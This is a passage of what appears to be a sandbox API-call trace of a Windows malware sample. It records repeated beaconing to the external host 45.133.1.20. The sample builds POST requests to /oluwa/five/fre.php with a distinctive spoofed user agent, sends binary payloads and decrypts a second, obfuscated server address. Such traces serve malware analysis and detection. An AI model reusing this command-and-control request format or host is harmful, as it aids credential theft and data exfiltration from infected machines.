(lpLibFileName="shlwapi") returned 0x77680000 [0298.938] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0298.939] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.939] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0298.940] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.941] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0298.941] GetProcessHeap () returned 0x6a0000 [0298.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0298.941] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0298.941] GetProcessHeap () returned 0x6a0000 [0298.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0298.941] socket (af=2, type=1, protocol=6) returned 0xb40 [0298.947] connect (s=0xb40, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0298.980] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0298.980] GetProcessHeap () returned 0x6a0000 [0298.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0298.980] GetProcessHeap () returned 0x6a0000 [0298.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0298.981] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0298.982] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0298.982] GetProcessHeap () returned 0x6a0000 [0298.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6db248 [0298.982] GetProcessHeap () returned 0x6a0000 [0298.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0298.983] GetProcessHeap () returned 0x6a0000 [0298.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0298.983] GetProcessHeap () returned 0x6a0000 [0298.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0298.984] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0298.985] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0298.985] GetProcessHeap () returned 0x6a0000 [0298.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0298.985] GetProcessHeap () returned 0x6a0000 [0298.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0298.985] send (s=0xb40, buf=0x6bd460*, len=242, flags=0) returned 242 [0298.986] send (s=0xb40, buf=0x6bb998*, len=159, flags=0) returned 159 [0298.986] GetProcessHeap () returned 0x6a0000 [0298.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0298.987] recv (in: s=0xb40, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0299.072] GetProcessHeap () returned 0x6a0000 [0299.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0299.073] GetProcessHeap () returned 0x6a0000 [0299.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0299.073] GetProcessHeap () returned 0x6a0000 [0299.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db248 | out: hHeap=0x6a0000) returned 1 [0299.073] GetProcessHeap () returned 0x6a0000 [0299.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0299.074] closesocket (s=0xb40) returned 0 [0299.075] GetProcessHeap () returned 0x6a0000 [0299.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0299.075] GetProcessHeap () returned 0x6a0000 [0299.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0299.076] GetProcessHeap () returned 0x6a0000 [0299.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0299.077] GetProcessHeap () returned 0x6a0000 [0299.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0299.077] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1868) returned 0xb40 [0299.080] Sleep (dwMilliseconds=0xea60) [0299.082] GetProcessHeap () returned 0x6a0000 [0299.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0299.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.084] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0299.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.095] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0299.104] GetProcessHeap () returned 0x6a0000 [0299.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0299.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.105] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0299.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.106] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0299.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.112] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.112] GetProcessHeap () returned 0x6a0000 [0299.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0299.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.116] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0299.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.117] CryptDestroyKey (hKey=0x6ad020) returned 1 [0299.117] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.117] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0299.117] GetProcessHeap () returned 0x6a0000 [0299.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0299.118] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.118] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0299.119] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.119] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0299.120] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.120] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0299.121] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.121] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0299.121] GetProcessHeap () returned 0x6a0000 [0299.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0299.121] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0299.122] GetProcessHeap () returned 0x6a0000 [0299.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0299.122] GetProcessHeap () returned 0x6a0000 [0299.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0299.123] GetProcessHeap () returned 0x6a0000 [0299.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0299.123] GetProcessHeap () returned 0x6a0000 [0299.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0299.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.127] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0299.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.132] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0299.141] GetProcessHeap () returned 0x6a0000 [0299.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0299.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.142] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0299.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.143] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0299.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.144] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.144] GetProcessHeap () returned 0x6a0000 [0299.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0299.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.146] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0299.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.147] CryptDestroyKey (hKey=0x6ad020) returned 1 [0299.148] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.148] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0299.148] GetProcessHeap () returned 0x6a0000 [0299.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0299.149] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.149] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0299.150] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.151] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0299.152] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.152] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0299.153] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.154] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0299.154] GetProcessHeap () returned 0x6a0000 [0299.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0299.154] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0299.154] GetProcessHeap () returned 0x6a0000 [0299.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0299.154] socket (af=2, type=1, protocol=6) returned 0xb44 [0299.154] connect (s=0xb44, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0299.177] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0299.177] GetProcessHeap () returned 0x6a0000 [0299.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0299.177] GetProcessHeap () returned 0x6a0000 [0299.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0299.178] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0299.179] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0299.180] GetProcessHeap () returned 0x6a0000 [0299.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6da588 [0299.180] GetProcessHeap () returned 0x6a0000 [0299.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0299.180] GetProcessHeap () returned 0x6a0000 [0299.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0299.180] GetProcessHeap () returned 0x6a0000 [0299.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0299.181] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0299.182] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0299.182] GetProcessHeap () returned 0x6a0000 [0299.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0299.182] GetProcessHeap () returned 0x6a0000 [0299.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0299.182] send (s=0xb44, buf=0x6bd460*, len=242, flags=0) returned 242 [0299.183] send (s=0xb44, buf=0x6bb998*, len=159, flags=0) returned 159 [0299.183] GetProcessHeap () returned 0x6a0000 [0299.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0299.183] recv (in: s=0xb44, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0299.254] GetProcessHeap () returned 0x6a0000 [0299.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0299.254] GetProcessHeap () returned 0x6a0000 [0299.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0299.255] GetProcessHeap () returned 0x6a0000 [0299.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da588 | out: hHeap=0x6a0000) returned 1 [0299.258] GetProcessHeap () returned 0x6a0000 [0299.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0299.258] closesocket (s=0xb44) returned 0 [0299.259] GetProcessHeap () returned 0x6a0000 [0299.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0299.259] GetProcessHeap () returned 0x6a0000 [0299.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0299.260] GetProcessHeap () returned 0x6a0000 [0299.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0299.260] GetProcessHeap () returned 0x6a0000 [0299.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0299.261] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1870) returned 0xb44 [0299.263] Sleep (dwMilliseconds=0xea60) [0299.265] GetProcessHeap () returned 0x6a0000 [0299.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0299.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.267] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0299.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.273] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0299.286] GetProcessHeap () returned 0x6a0000 [0299.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0299.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.297] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0299.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.298] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0299.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.299] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.299] GetProcessHeap () returned 0x6a0000 [0299.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0299.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.303] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0299.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.336] CryptDestroyKey (hKey=0x6ad020) returned 1 [0299.337] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.338] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0299.338] GetProcessHeap () returned 0x6a0000 [0299.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0299.339] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.339] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0299.340] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.340] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0299.343] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.344] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0299.344] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.344] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0299.344] GetProcessHeap () returned 0x6a0000 [0299.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0299.345] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0299.345] GetProcessHeap () returned 0x6a0000 [0299.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0299.346] GetProcessHeap () returned 0x6a0000 [0299.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0299.346] GetProcessHeap () returned 0x6a0000 [0299.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0299.347] GetProcessHeap () returned 0x6a0000 [0299.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0299.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.348] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0299.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.367] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0299.381] GetProcessHeap () returned 0x6a0000 [0299.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0299.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.382] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0299.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.384] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0299.385] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.385] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.385] GetProcessHeap () returned 0x6a0000 [0299.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0299.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.387] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0299.388] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.388] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0299.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.390] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0299.390] GetProcessHeap () returned 0x6a0000 [0299.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0299.390] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.391] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0299.392] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.392] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0299.393] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.394] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0299.395] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.395] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0299.395] GetProcessHeap () returned 0x6a0000 [0299.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0299.395] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: 